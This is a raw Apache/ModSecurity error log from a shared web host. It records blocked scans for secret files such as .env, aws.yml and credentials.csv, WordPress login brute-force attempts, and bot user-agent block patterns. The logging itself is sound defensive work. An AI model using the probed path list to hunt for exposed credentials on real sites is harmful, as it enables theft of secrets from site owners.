[Tue May 26 18:48:49.754672 2026] [security2:error] [pid 1025417:tid 1025632] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWduVHbArxonFeMXvQtxQAAVWU"]
[Tue May 26 18:48:49.921354 2026] [security2:error] [pid 1025417:tid 1025657] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWduVHbArxonFeMXvQtvgAAAG4"]
[Tue May 26 18:48:50.881540 2026] [security2:error] [pid 1025417:tid 1025419] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/settings.php"] [unique_id "ahWdulHbArxonFeMXvQt3wAAGgE"]
[Tue May 26 18:48:52.181284 2026] [security2:error] [pid 1025417:tid 1025420] [remote 121.200.216.55:42974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdu1HbArxonFeMXvQt_AAAKAI"]
[Tue May 26 18:48:52.749314 2026] [security2:error] [pid 1025417:tid 1025529] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/s3.php"] [unique_id "ahWdvFHbArxonFeMXvQuEAAAb28"]
[Tue May 26 18:48:53.808749 2026] [security2:error] [pid 1025417:tid 1025422] [remote 216.73.216.30:59910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdvVHbArxonFeMXvQuNAAAGAQ"]
[Tue May 26 18:48:54.333884 2026] [security2:error] [pid 1025417:tid 1025424] [remote 148.72.177.93:35072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.177.72.148.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdvlHbArxonFeMXvQuPQAAEQY"]
[Tue May 26 18:48:54.535708 2026] [security2:error] [pid 1025417:tid 1025543] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/smtp.php"] [unique_id "ahWdvlHbArxonFeMXvQuSgAAEn0"]
[Tue May 26 18:48:54.793271 2026] [security2:error] [pid 1025417:tid 1025613] [client 85.11.167.19:52706] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "goadityaholidays.com"] [uri "/.env"] [unique_id "ahWdvlHbArxonFeMXvQuUwAAAEI"]
[Tue May 26 18:48:55.008875 2026] [security2:error] [pid 1025417:tid 1025553] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdvlHbArxonFeMXvQuTgAAAAY"]
[Tue May 26 18:48:55.415129 2026] [security2:error] [pid 1025417:tid 1025599] [client 85.11.167.19:52722] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "goadityaholidays.com"] [uri "/"] [unique_id "ahWdv1HbArxonFeMXvQuYAAAADQ"]
[Tue May 26 18:48:55.655981 2026] [security2:error] [pid 1025417:tid 1025626] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdv1HbArxonFeMXvQuaQAAAE8"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1261213&moderation-hash=c3216d971620d5dae8b0519854a3d0bc
[Tue May 26 18:48:56.462452 2026] [security2:error] [pid 1025417:tid 1025540] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/aws.yml"] [unique_id "ahWdwFHbArxonFeMXvQufQAAKHo"]
[Tue May 26 18:48:56.778233 2026] [security2:error] [pid 1025417:tid 1025569] [client 85.11.167.19:52738] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/.env"] [unique_id "ahWdwFHbArxonFeMXvQuiwAAABY"]
[Tue May 26 18:48:57.311869 2026] [security2:error] [pid 1025417:tid 1025556] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdwFHbArxonFeMXvQulAAAAAk"]
[Tue May 26 18:48:57.619162 2026] [security2:error] [pid 1025417:tid 1025577] [client 85.11.167.19:52744] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/"] [unique_id "ahWdwVHbArxonFeMXvQuogAAAB4"]
[Tue May 26 18:48:58.356218 2026] [security2:error] [pid 1025417:tid 1025448] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/credentials.csv"] [unique_id "ahWdwlHbArxonFeMXvQusQAAaB4"]
[Tue May 26 18:48:58.570321 2026] [security2:error] [pid 1025417:tid 1025438] [remote 216.73.216.30:59910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdwlHbArxonFeMXvQutwAAMRQ"]
[Tue May 26 18:48:59.204862 2026] [security2:error] [pid 1025417:tid 1025625] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdwlHbArxonFeMXvQuuwAAAE4"]
[Tue May 26 18:49:00.234069 2026] [security2:error] [pid 1025417:tid 1025439] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/aws.json"] [unique_id "ahWdxFHbArxonFeMXvQu3QAAYhU"]
[Tue May 26 18:49:00.332616 2026] [security2:error] [pid 1025417:tid 1025445] [remote 148.72.177.93:35072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.177.72.148.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdxFHbArxonFeMXvQu3gAABBs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:49:00.413760 2026] [security2:error] [pid 1025417:tid 1025451] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdxFHbArxonFeMXvQu3wAAOiE"]
[Tue May 26 18:49:00.413932 2026] [security2:error] [pid 1025417:tid 1025605] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdxFHbArxonFeMXvQu3wAAOiE"]
[Tue May 26 18:49:01.675749 2026] [security2:error] [pid 1025417:tid 1025590] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdxVHbArxonFeMXvQu_QAAACs"]
[Tue May 26 18:49:02.289315 2026] [security2:error] [pid 1025417:tid 1025456] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/production.yml"] [unique_id "ahWdxlHbArxonFeMXvQvHgAAECY"]
[Tue May 26 18:49:03.842086 2026] [security2:error] [pid 1025417:tid 1025469] [remote 216.73.216.30:4228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdx1HbArxonFeMXvQvTgAADzM"]
[Tue May 26 18:49:04.228274 2026] [security2:error] [pid 1025417:tid 1025463] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/server/settings.py"] [unique_id "ahWdyFHbArxonFeMXvQvWgAAZS0"]
[Tue May 26 18:49:04.441372 2026] [security2:error] [pid 1025417:tid 1025549] [client 195.2.84.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdyFHbArxonFeMXvQvZQAAAAI"], referer: http://www.anujtradingco.com/features/pie-chart-progress-bar/
[Tue May 26 18:49:04.575482 2026] [security2:error] [pid 1025417:tid 1025586] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdyFHbArxonFeMXvQvVQAAACc"]
[Tue May 26 18:49:04.889955 2026] [security2:error] [pid 1025417:tid 1025646] [client 195.2.84.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdyFHbArxonFeMXvQvdQAAAGM"], referer: http://anujtradingco.com/features/pie-chart-progress-bar/
[Tue May 26 18:49:05.242924 2026] [security2:error] [pid 1025417:tid 1025560] [client 66.146.232.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdyVHbArxonFeMXvQvggAAAA0"], referer: https://www.anujtradingco.com/
[Tue May 26 18:49:06.115814 2026] [security2:error] [pid 1025417:tid 1025483] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/src/config.json"] [unique_id "ahWdylHbArxonFeMXvQvkwAAJ0E"]
[Tue May 26 18:49:07.089946 2026] [security2:error] [pid 1025417:tid 1025599] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdylHbArxonFeMXvQvpAAAADQ"]
[Tue May 26 18:49:07.830253 2026] [security2:error] [pid 1025417:tid 1025555] [client 66.146.232.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdy1HbArxonFeMXvQvxgAAAAg"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1231675&moderation-hash=b9f3913f537919d09439896dc0e6dc48
[Tue May 26 18:49:08.041524 2026] [security2:error] [pid 1025417:tid 1025498] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/api/config.php"] [unique_id "ahWdzFHbArxonFeMXvQvzQAAAFA"]
[Tue May 26 18:49:08.593196 2026] [security2:error] [pid 1025417:tid 1025471] [remote 216.73.216.30:4228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdzFHbArxonFeMXvQv2gAARjU"]
[Tue May 26 18:49:08.978186 2026] [security2:error] [pid 1025417:tid 1025475] [remote 141.95.202.18:36458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWdzFHbArxonFeMXvQv3wAAcjk"]
[Tue May 26 18:49:09.923783 2026] [security2:error] [pid 1025417:tid 1025503] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/staging.yml"] [unique_id "ahWdzVHbArxonFeMXvQv_AAAYFU"]
[Tue May 26 18:49:09.953860 2026] [security2:error] [pid 1025417:tid 1025550] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdzVHbArxonFeMXvQv9gAAAAM"]
[Tue May 26 18:49:10.801204 2026] [security2:error] [pid 1025417:tid 1025504] [remote 141.95.202.18:36458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWdzlHbArxonFeMXvQwHQAAVVY"], referer: https://rohiniventures.com/wp-login.php
[Tue May 26 18:49:11.411339 2026] [security2:error] [pid 1025417:tid 1025507] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdz1HbArxonFeMXvQwLAAAF1k"]
[Tue May 26 18:49:11.411577 2026] [security2:error] [pid 1025417:tid 1025570] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdz1HbArxonFeMXvQwLAAAF1k"]
[Tue May 26 18:49:11.795271 2026] [security2:error] [pid 1025417:tid 1025494] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/enviroments/.env.production"] [unique_id "ahWdz1HbArxonFeMXvQwRAAAAkw"]
[Tue May 26 18:49:11.933423 2026] [security2:error] [pid 1025417:tid 1025658] [client 66.146.232.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdz1HbArxonFeMXvQwSAAAAG8"], referer: https://anujtradingco.com
[Tue May 26 18:49:12.125912 2026] [security2:error] [pid 1025417:tid 1025672] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdz1HbArxonFeMXvQwQwAAAH0"]
[Tue May 26 18:49:12.667178 2026] [security2:error] [pid 1025417:tid 1025520] [remote 52.18.195.140:54130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWd0FHbArxonFeMXvQwXAAAJ2Y"]
[Tue May 26 18:49:13.601717 2026] [security2:error] [pid 1025417:tid 1025500] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/includes/config.inc.php"] [unique_id "ahWd0VHbArxonFeMXvQwdQAAQFI"]
[Tue May 26 18:49:14.214727 2026] [security2:error] [pid 1025417:tid 1025643] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd0VHbArxonFeMXvQweQAAAGA"]
[Tue May 26 18:49:14.591119 2026] [security2:error] [pid 1025417:tid 1025555] [client 146.174.169.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd0lHbArxonFeMXvQwiwAAAAg"]
[Tue May 26 18:49:14.910821 2026] [ssl:error] [pid 1025417:tid 1025556] [client 199.45.155.71:54160] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname canopykaapi.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 18:49:15.168905 2026] [autoindex:error] [pid 1025417:tid 1025559] [client 45.134.225.250:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com/
[Tue May 26 18:49:15.590890 2026] [security2:error] [pid 1025417:tid 1025523] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/utils/s3-aws.js"] [unique_id "ahWd01HbArxonFeMXvQwtAAAN2k"]
[Tue May 26 18:49:15.712045 2026] [security2:error] [pid 1025417:tid 1025671] [client 185.191.171.1:29434] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/september-16th/day/2025-02-09/"] [unique_id "ahWd01HbArxonFeMXvQwtQAAAHw"]
[Tue May 26 18:49:15.712197 2026] [security2:error] [pid 1025417:tid 1025671] [client 185.191.171.1:29434] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/september-16th/day/2025-02-09/"] [unique_id "ahWd01HbArxonFeMXvQwtQAAAHw"]
[Tue May 26 18:49:16.777183 2026] [security2:error] [pid 1025417:tid 1025633] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd1FHbArxonFeMXvQwywAAAFY"]
[Tue May 26 18:49:17.253534 2026] [security2:error] [pid 1025417:tid 1025611] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWd1VHbArxonFeMXvQw4wAAAEA"], referer: https://www.anujtradingco.com/
[Tue May 26 18:49:17.422555 2026] [security2:error] [pid 1025417:tid 1025531] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config.js"] [unique_id "ahWd1VHbArxonFeMXvQw6wAAZ3E"]
[Tue May 26 18:49:17.727970 2026] [security2:error] [pid 1025417:tid 1025422] [remote 94.76.235.103:47140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWd1VHbArxonFeMXvQw7wAAMgQ"]
[Tue May 26 18:49:17.745061 2026] [security2:error] [pid 1025417:tid 1025541] [remote 54.39.210.77:61164] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "shahvishaal.com"] [uri "/robots.txt"] [unique_id "ahWd1VHbArxonFeMXvQw9QAATXs"]
[Tue May 26 18:49:17.745198 2026] [security2:error] [pid 1025417:tid 1025624] [client 54.39.210.77:61164] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "shahvishaal.com"] [uri "/robots.txt"] [unique_id "ahWd1VHbArxonFeMXvQw9QAATXs"]
[Tue May 26 18:49:17.828820 2026] [security2:error] [pid 1025417:tid 1025593] [client 216.244.66.241:33814] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/cryaesthesiabfbe/fbdbfc1053795.shtml"] [unique_id "ahWd1VHbArxonFeMXvQw9gAAAC4"]
[Tue May 26 18:49:17.828905 2026] [security2:error] [pid 1025417:tid 1025593] [client 216.244.66.241:33814] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/cryaesthesiabfbe/fbdbfc1053795.shtml"] [unique_id "ahWd1VHbArxonFeMXvQw9gAAAC4"]
[Tue May 26 18:49:17.984916 2026] [security2:error] [pid 1025417:tid 1025555] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWd1VHbArxonFeMXvQxAQAAAAg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
